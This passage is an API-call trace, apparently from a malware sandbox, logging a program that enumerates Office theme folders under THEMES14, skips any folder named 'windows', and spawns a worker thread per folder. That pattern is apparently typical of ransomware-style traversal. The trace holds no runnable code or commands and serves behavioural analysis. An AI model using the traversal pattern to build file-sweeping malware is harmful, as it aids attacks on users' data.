lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.298] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="BREEZE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE" [0044.298] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*" [0044.298] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.298] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116999a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0044.299] CloseHandle (hObject=0x4f8) returned 1 [0044.299] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CANYON", cAlternateFileName="")) returned 1 [0044.299] lstrcmpW (lpString1=".", lpString2="CANYON") returned -1 [0044.299] lstrcmpW (lpString1="..", lpString2="CANYON") returned -1 [0044.299] lstrcmpiW (lpString1="windows", lpString2="CANYON") returned 1 [0044.301] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.301] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.301] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="CANYON" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON" [0044.301] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*" [0044.301] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.301] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116b1a10, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0045.392] CloseHandle (hObject=0x4f8) returned 1 [0045.392] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAPSULES", cAlternateFileName="")) returned 1 [0045.392] lstrcmpW (lpString1=".", lpString2="CAPSULES") returned -1 [0045.392] lstrcmpW (lpString1="..", lpString2="CAPSULES") returned -1 [0045.392] lstrcmpiW (lpString1="windows", lpString2="CAPSULES") returned 1 [0048.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="CAPSULES" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES" [0048.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*.*" [0048.472] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5dc88d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.477] CloseHandle (hObject=0x51c) returned 1 [0048.477] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CASCADE", cAlternateFileName="")) returned 1 [0048.477] lstrcmpW (lpString1=".", lpString2="CASCADE") returned -1 [0048.477] lstrcmpW (lpString1="..", lpString2="CASCADE") returned -1 [0048.477] lstrcmpiW (lpString1="windows", lpString2="CASCADE") returned 1 [0048.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.477] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.477] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="CASCADE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE" [0048.477] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*.*" [0048.477] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x998ac58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.482] CloseHandle (hObject=0x51c) returned 1 [0048.483] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="COMPASS", cAlternateFileName="")) returned 1 [0048.483] lstrcmpW (lpString1=".", lpString2="COMPASS") returned -1 [0048.483] lstrcmpW (lpString1="..", lpString2="COMPASS") returned -1 [0048.483] lstrcmpiW (lpString1="windows", lpString2="COMPASS") returned 1 [0048.483] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.483] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.483] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="COMPASS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS" [0048.483] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*.*" [0048.483] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.483] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108b0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.487] CloseHandle (hObject=0x51c) returned 1 [0048.487] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CONCRETE", cAlternateFileName="")) returned 1 [0048.487] lstrcmpW (lpString1=".", lpString2="CONCRETE") returned -1 [0048.487] lstrcmpW (lpString1="..", lpString2="CONCRETE") returned -1 [0048.487] lstrcmpiW (lpString1="windows", lpString2="CONCRETE") returned 1 [0048.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.487] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="CONCRETE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE" [0048.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*.*" [0048.487] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1137c440, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.492] CloseHandle (hObject=0x51c) returned 1 [0048.492] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEEPBLUE", cAlternateFileName="")) returned 1 [0048.492] lstrcmpW (lpString1=".", lpString2="DEEPBLUE") returned -1 [0048.492] lstrcmpW (lpString1="..", lpString2="DEEPBLUE") returned -1 [0048.492] lstrcmpiW (lpString1="windows", lpString2="DEEPBLUE") returned 1 [0048.492] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.492] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="DEEPBLUE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE" [0048.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*.*" [0048.493] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ed00d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.509] CloseHandle (hObject=0x51c) returned 1 [0048.509] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ECHO", cAlternateFileName="")) returned 1 [0048.509] lstrcmpW (lpString1=".", lpString2="ECHO") returned -1 [0048.509] lstrcmpW (lpString1="..", lpString2="ECHO") returned -1 [0048.509] lstrcmpiW (lpString1="windows", lpString2="ECHO") returned 1 [0048.509] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.509] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.509] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="ECHO" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO" [0048.509] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*.*" [0048.509] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93701e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.513] CloseHandle (hObject=0x51c) returned 1 [0048.513] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ECLIPSE", cAlternateFileName="")) returned 1 [0048.513] lstrcmpW (lpString1=".", lpString2="ECLIPSE") returned -1 [0048.513] lstrcmpW (lpString1="..", lpString2="ECLIPSE") returned -1 [0048.513] lstrcmpiW (lpString1="windows", lpString2="ECLIPSE") returned 1 [0048.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="ECLIPSE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE" [0048.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*.*" [0048.513] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9972bf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.520] CloseHandle (hObject=0x51c) returned 1 [0048.520] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EDGE", cAlternateFileName="")) returned 1 [0048.520] lstrcmpW (lpString1=".", lpString2="EDGE") returned -1 [0048.520] lstrcmpW (lpString1="..", lpString2="EDGE") returned -1 [0048.520] lstrcmpiW (lpString1="windows", lpString2="EDGE") returned 1 [0048.520] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="EDGE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE" [0048.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*.*" [0048.520] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115f16d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.531] CloseHandle (hObject=0x51c) returned 1 [0048.531] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVRGREEN", cAlternateFileName="")) returned 1 [0048.531] lstrcmpW (lpString1=".", lpString2="EVRGREEN") returned -1 [0048.531] lstrcmpW (lpString1="..", lpString2="EVRGREEN") returned -1 [0048.531] lstrcmpiW (lpString1="windows", lpString2="EVRGREEN") returned 1 [0048.531] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.531] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.531] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="EVRGREEN" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN" [0048.531] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*.*" [0048.531] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11609738, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.554] CloseHandle (hObject=0x51c) returned 1 [0048.554] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXPEDITN", cAlternateFileName="")) returned 1 [0048.554] lstrcmpW (lpString1=".", lpString2="EXPEDITN") returned -1 [0048.554] lstrcmpW (lpString1="..", lpString2="EXPEDITN") returned -1 [0048.554] lstrcmpiW (lpString1="windows", lpString2="EXPEDITN") returned 1 [0048.557] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.557] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.557] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="EXPEDITN" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN" [0048.557] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*.*" [0048.557] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x245f5198, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0048.576] CloseHandle (hObject=0x51c) returned 1 [0048.576] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ICE", cAlternateFileName="")) returned 1 [0048.576] lstrcmpW (lpString1=".", lpString2="ICE") returned -1 [0048.576] lstrcmpW (lpString1="..", lpString2="ICE") returned -1 [0048.576] lstrcmpiW (lpString1="windows", lpString2="ICE") returned 1 [0048.586] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.586] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.586] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="ICE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE") returned="\\\\?\\C:\\Program Files\\Common 